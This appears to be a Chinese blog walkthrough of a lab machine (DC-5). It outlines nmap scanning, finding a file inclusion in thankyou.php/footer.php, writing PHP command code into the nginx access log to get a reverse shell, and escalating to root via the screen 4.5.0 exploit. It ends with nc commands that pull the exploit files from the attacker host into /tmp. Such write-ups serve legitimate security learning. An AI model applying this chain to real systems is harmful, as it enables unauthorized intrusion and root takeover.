赞
踩
世间一切皆可努力
感谢浏览
目录
1.查看kali的网卡、IP等信息;(网卡名:eth0,IP地址:192.168.97.129)
3.探测特定网络的主机存活状态;(netdiscover,arp-scan、nmap)
2.在扫描的同时,访问主页、robots.txt、指纹识别;
5.测试http://192.168.97.156/contact;
6.结合BP,爆破thankyou.php页面,验证是否是文件包含;
7.访问http://192.168.97.156/footer.php;
(四)渗透测试——利用nginx的日志和文件包含漏洞,Getshell
1.向/var/log/access/nginx/log内写入系统cmd和phpinfo()函数;
2.利用文件包含,读取日志,验证是否写入cmd和phpinfo();
3.利用文件包含,执行刚刚上传的php代码,从而调用cmd执行系统命令,反弹shell;
(五)渗透测试——致命连问,进一步信息收集,从而获取root权限
3.nginx的日志/var/log/nginx/access.log自动记录正确的GET请求,从此处写入恶意代码;
4.screen 4.5.0存在着提权漏洞41154.sh(需要修改,提前编译,以及:set ff=unix);
-a 显示详细信息
-i 指定出口网卡
-r 指定待扫描网段
--localnet or -l 指定扫描本地网络
-sP ping扫描且不扫描端口
-p- 扫描全端口
-sV 扫描端口的服务信息
-O/A 扫描靶机的运行的操作系统信息
如下图所示,就只有两个目录:css、images
如下图所示,破解出了about-us、solutions、footer页面(因为about-us和solutions页面主页上有明显标出,又因为copyright在页脚的位置,footer.php也是页脚页面的意思,那么我猜测可能就是footer页面有文件包含)
如下图所示,f15刷新,即可出现不同的页面
如下图所示,放通即可向日志内写入cmd和phpinfo()函数
如下图所示,phpinfo()函数起到了作用,所以写入成功
如下图所示,发现了可以命令:/bin/screen-4.5.0
如下图所示,51154.sh
如下图所示,把该Exp复制到当前目录;但是这个脚本直接执行是出错的,我们需要完成以下几个工作
nc -lp 1234 < libhax.so
nc -lp 1234 < rootshell
nc -lp 1234 < dc5.sh
cd /tmp
nc -nv 192.168.97.129 1234 > libhax.so
nc -nv 192.168.97.129 1234 > rootshell
nc -nv 192.168.97.129 1234 > dc5.sh
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。